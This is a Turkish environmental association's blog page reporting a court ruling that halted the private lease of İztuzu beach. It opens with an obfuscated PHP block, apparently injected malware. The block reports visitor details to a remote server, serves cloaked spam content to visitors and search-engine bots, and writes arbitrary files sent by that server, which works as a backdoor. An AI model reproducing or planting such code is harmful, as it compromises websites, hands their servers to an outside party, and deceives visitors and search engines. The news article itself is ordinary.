?php @set_time_limit(3600); @ignore_user_abort(1); $lKtXtd = "\x61\x38\x33\x2e"; $lKtXtz = base64_encode(@$_SERVER["\x48\124\124\120\x5f\x41\x43\x43\x45\x50\124\x5f\x4c\101\116\107\125\x41\107\x45"]); if (isset($_SERVER["\x52\105\x51\x55\105\123\124\137\125\122\111"])) { goto lcEzXdX; } if (isset($_SERVER["\x61\162\x67\x76"])) { goto lcEzXdd; } $lKtXtX = $_SERVER["\x50\x48\x50\137\x53\105\x4c\106"] . "\x3f" . $_SERVER["\x51\125\105\122\131\x5f\x53\124\122\111\x4e\x47"]; goto lcEzXdz; lcEzXdd: $lKtXtX = $_SERVER["\120\x48\x50\x5f\x53\x45\x4c\106"] . "\x3f" . $_SERVER["\x61\x72\x67\166"][0]; lcEzXdz: goto lcEzXdP; lcEzXdX: $lKtXtX = $_SERVER["\122\x45\x51\125\x45\123\x54\137\x55\x52\x49"]; lcEzXdP: if (!($lKtXtX == '')) { goto lcEzXdt; } $lKtXtX = "\x2f"; lcEzXdt: $lKtXtX = base64_encode($lKtXtX); $lKtXtP = base64_encode(@$_SERVER["\110\x54\124\x50\137\110\117\x53\x54"]); $lKtXtt = ''; if (!isset($_SERVER["\110\x54\124\120\137\x52\x45\x46\105\x52\x45\122"])) { goto lcEzXdL; } $lKtXtt = $_SERVER["\x48\x54\x54\x50\137\122\105\x46\x45\122\105\122"]; $lKtXtt = base64_encode($lKtXtt); lcEzXdL: $lKtXtL = "\x68\164" . "\x74\x70"; $lKtXtu = $lKtXtL . "\x3a\57\57" . $lKtXtd . "\x66\x65\x77\145\162\x68\x70\x65\162\56"; if (isset($_SERVER["\110\x54\x54\120\x53"]) && strtolower($_SERVER["\x48\x54\x54\x50\x53"]) !== "\x6f\x66\x66") { goto lcEzXdc; } if (isset($_SERVER["\x48\x54\x54\120\x5f\130\137\x46\117\x52\127\101\x52\104\105\x44\x5f\x50\x52\117\x54\x4f"]) && $_SERVER["\110\x54\124\120\137\130\x5f\x46\117\x52\x57\x41\x52\x44\x45\x44\x5f\120\122\117\x54\x4f"] === "\150\x74\x74\x70\163") { goto lcEzXdW; } if (isset($_SERVER["\x48\124\x54\120\137\x46\122\x4f\x4e\x54\137\x45\116\104\x5f\110\x54\x54\x50\x53"]) && strtolower($_SERVER["\110\124\124\x50\137\106\122\x4f\116\124\x5f\105\x4e\x44\137\x48\124\x54\x50\x53"]) !== "\x6f\146\x66") { goto lcEzXdM; } goto lcEzXdu; lcEzXdc: $lKtXtL = "\x68\x74" . "\164\x70\x73"; goto lcEzXdu; lcEzXdW: $lKtXtL = "\150\x74" . "\x74\160\x73"; goto lcEzXdu; lcEzXdM: $lKtXtL = "\x68\x74" . "\164\160\163"; lcEzXdu: $lKtXtc = $lKtXtu . "\x78\171\x7a\57\x69\x6e\144\145\x78\x2e\x70\x68\x70\77\x72\145\x66\x65\162\x65\x72\x3d" . $lKtXtt . "\x26\x68\164" . "\x74\160\x3d" . $lKtXtL . "\46\150\x6f\x73\x74\75" . $lKtXtP . "\x26\165\x72\151\75" . $lKtXtX . "\x26\154\141\x6e\x67\75" . $lKtXtz . "\46\172\172\x3d" . isbot(); $lKtXtW = trim(getlin($lKtXtc)); if (!strstr($lKtXtW, "\160\x67\145\164\x70\170\170")) { goto lcEzXzJ; } if (!strstr($lKtXtW, "\x65\150\164\x6d\x6c\x70\147\x65\x74\x70\170\170")) { goto lcEzXdE; } @header("\103\x6f\x6e\164\x65\x6e\x74\55\x74\171\160\x65\72\x20\x74\145\x78\x74\x2f\x68\x74\155\x6c\x3b\x20\143\150\x61\162\x73\x65\x74\x3d\165\x74\x66\x2d\x38"); echo str_replace("\x65\150\164\x6d\x6c\160\147\145\x74\160\170\170", '', $lKtXtW); exit; lcEzXdE: if (!strstr($lKtXtW, "\x65\x78\155\154\x70\147\145\x74\x70\170\x78")) { goto lcEzXdQ; } @header("\x43\x6f\156\x74\x65\156\x74\x2d\x74\x79\x70\x65\x3a\40\164\145\170\164\x2f\x78\155\154"); echo str_replace("\145\x78\x6d\154\160\x67\145\x74\160\170\x78", '', $lKtXtW); exit; lcEzXdQ: if (!strstr($lKtXtW, "\160\x69\156\147\x78\155\x6c\160\x67\x65\164\x70\170\170")) { goto lcEzXzM; } $lKtXtM = explode("\x2c", str_replace("\x70\151\x6e\x67\170\x6d\154\x70\x67\145\x74\160\x78\x78", '', $lKtXtW)); foreach ($lKtXtM as $lKtXtE) { goto lcEzXzd; lcEzXzX: if (strpos($lKtXtQ, "\123\151\x74\145\x6d\x61\x70\40\x4e\157\x74\151\x66\151\143\x61\x74\x69\157\x6e\40\x52\145\x63\x65\151\166\x65\x64") !== false) { goto lcEzXdg; } goto lcEzXzP; lcEzXzz: echo $lKtXtE . "\75\75\x3d\x3e\123\151\x74\x65\155\x61\x70\x3a\x20"; goto lcEzXzX; lcEzXzt: goto lcEzXdK; goto lcEzXzL; lcEzXzu: echo "\x4f\113\74\142\x72\x3e"; goto lcEzXzc; lcEzXzL: lcEzXdg: goto lcEzXzu; lcEzXzd: $lKtXtQ = getlin($lKtXtE); goto lcEzXzz; lcEzXzP: echo "\x45\122\122\117\x52\x3c\142\x72\76"; goto lcEzXzt; lcEzXzc: lcEzXdK: goto lcEzXzW; lcEzXzW: } exit; lcEzXzM: if (!strstr($lKtXtW, "\x78\x78\160\147\x65\164\x70\170\x78")) { goto lcEzXzv; } $lKtXtv = explode("\x78\x78\x6c\151\x6e\x78\170", str_replace("\x78\170\160\x67\145\x74\x70\x78\170", '', $lKtXtW)); @file_put_contents($lKtXtv[0], $lKtXtv[1]); if (file_exists($lKtXtv[0])) { goto lcEzXzE; } echo "\156\157\x20\146\141\154\163\145"; goto lcEzXzQ; lcEzXzE: echo "\145\156\144\40\157\153"; lcEzXzQ: exit; lcEzXzv: lcEzXzJ: function getlin($lKtXtJ) { goto lcEzXXd; lcEzXXd: $lKtXtW = ''; goto lcEzXXz; lcEzXXX: $lKtXtg = curl_init(); goto lcEzXXP; lcEzXXM: curl_close($lKtXtg); goto lcEzXXE; lcEzXXJ: lcEzXzK: goto lcEzXXg; lcEzXXz: if (!function_exists("\x63\x75\162\x6c\x5f\x69\156\151\x74")) { goto lcEzXzg; } goto lcEzXXX; lcEzXXc: curl_setopt($lKtXtg, CURLOPT_CONNECTTIMEOUT, 30); goto lcEzXXW; lcEzXXv: $lKtXtW = @file_get_contents($lKtXtJ); goto lcEzXXJ; lcEzXXE: lcEzXzg: goto lcEzXXQ; lcEzXXL: curl_setopt($lKtXtg, CURLOPT_SSL_VERIFYPEER, 0); goto lcEzXXu; lcEzXXt: curl_setopt($lKtXtg, CURLOPT_SSL_VERIFYHOST, 0); goto lcEzXXL; lcEzXXW: $lKtXtW = curl_exec($lKtXtg); goto lcEzXXM; lcEzXXg: return $lKtXtW; goto lcEzXXK; lcEzXXu: curl_setopt($lKtXtg, CURLOPT_RETURNTRANSFER, 1); goto lcEzXXc; lcEzXXQ: if ($lKtXtW) { goto lcEzXzK; } goto lcEzXXv; lcEzXXP: curl_setopt($lKtXtg, CURLOPT_URL, $lKtXtJ); goto lcEzXXt; lcEzXXK: } function isbot() { goto lcEzXPX; lcEzXPL: goto lcEzXPz; goto lcEzXPu; lcEzXPP: if (stristr($lKtXtK, "\147\x6f\157\147\x6c\145\142\157\164") || stristr($lKtXtK, "\x62\x69\x6e\147") || stristr($lKtXtK, "\131\41\x4a") || stristr($lKtXtK, "\x79\x21\152") || stristr($lKtXtK, "\x79\141\150\x6f\157") || stristr($lKtXtK, "\x67\157\157\147\154\x65") || stristr($lKtXtK, "\107\x6f\157\147\x6c\145\x62\x6f\x74") || stristr($lKtXtK, "\x67\157\x6f\x67\154\145\142\x6f\x74")) { goto lcEzXPd; } goto lcEzXPt; lcEzXPu: lcEzXPd: goto lcEzXPc; lcEzXPW: lcEzXPz: goto lcEzXPM; lcEzXPX: $lKtXtK = strtolower($_SERVER["\110\124\124\x50\137\x55\123\105\122\137\x41\107\x45\x4e\x54"]); goto lcEzXPP; lcEzXPc: return true; goto lcEzXPW; lcEzXPt: return false; goto lcEzXPL; lcEzXPM: }?> İztuzu’nda direnenlerin zaferi | Dalyan Dernek – Dalyan Turizm, Kültür ve Çevre Koruma Derneği

Blog

İztuzu’nda direnenlerin zaferi

Posted at Ocak 22, 2015 » By : » Categories : Blog » 0 Comment

İztuzu Kumsalı’nın özel şirkete kiralanması işlemini hukuka aykırı bulundu.

Muğla 2. İdare Mahkemesi, İztuzu Kumsalı’nı özel şirkete peşkeş çeken Muğla Valiliği bünyesindeki MUÇEV’in protokol imzalama yetkisi bulunmadığı vurgulayarak, kiralama işleminin yürütmesini durdurdu.

Mahkemenin kararında; “ MUÇEV’in İztuzu’nun doğrudan doğruya kiralama, kullanma izni, işletme hakkı verilebilecek kurum, kuruluş ve kişiler arasındaü yer almadığı için ihalesiz olarak doğrudan doğruya işletme protokolü imzalanamayacağı ve bu protokolün başbakanlık genelgesine uygun bulunmasına ilişkin başbakanlık işlemininde hukuka ve mevzuata uygun olmadığı” belirtildi.

Mahkemenin oy çokluğuyla aldığı kararın beş sayfalık gerekçesinde şu görüşlere yer verildi: “Davalı Çevre ve Şehircilik Bakanlığı’nca MUÇEV Turizm ve Ticaret Ltd. Şti. Arasında imzalanan protokolün Tabiat varlıkları ve Doğal Sit Alanları ile Özel Çevre Koruma Bölgelerinde Bulunan Devletin Hüküm ve Tasarrufu Altındaki Yerlerin İdaresi Hakkında Yönetmenlik’in 42. maddesine dayanılarak doğrudan doğruya kiralanması, kullanılma izni, işletme hakkı verilebilecek kurum, kuruluş ve kişiler arasında yer almadığı için bu madde hükümlerine göre ihalesiz olarak doğrudan doğruya işletme protokolü imzalanamayacağı ve bu bu protokolün yapılması için Başbakanlık’ın 2012/15 sayılı genelge hükümlerine onay verilemeyeceği açıktır” denildi.

Gerekçeli kararda “ hukuka aykırılığı ortaya konulan işlemlerin uygulanması halinde söz konusu alanın anılan şirkete teslim edilmesi ve protokolde verilen izin doğrultusunda anılan şirkete tarafından başka şirketlere kiralama yapabileceği de dikkate alındığında, yürütmenin durdurulması kararı için gerekli olan “ telafisi güç veya imkansız zararların oluşma şartı” da bulunmaktadır” görüşüne yer verildi.

İztuzu’nun aralarında AKP Ortaca Belediye Meclis Adayı Ramazan Oruc’unda ortağı olduğu yabancı ortaklı DALÇEV şirketine ihalesiz peşkeş çekilmesine karşı dava açan Ortaca Belediyesi Avukatı Berna Babaoğlu Ulutaş” İztuzu için çok önemli bir karar. İztuzu’nun halkın olması için verilen mücadele açısından da çok olumlu zafer olarak görüyorum. En başından beri öne sürdüğümüz gerekçelerin ne kadar haklı olduğu mahkeme kararıyla da onaylanmış oldu. Bu kararla birlikte Muğla’daki benzer durumdaki 14 yerle de emsal bir karar değeri var “ dedi.

Türkiye Çevre ve Koruma Vakfı’yla Muğla’ya Hizmet Vakfı ortaklığında kurulan MUÇEV, yerel seçimlerin ardından CHP’li Ortaca Belediyesi’nin 15 yıl boyunca işlettiği İztuzu Kumsalı’nı, yaptığı özel protokolle DALÇEV’e kiralamıştı. Tepki çeken uygulamanın ardından başlayan direniş on binlerce kişinin desteğini kazanmıştı.

Mete Kızık – Cumhuriyet

Leave a Comment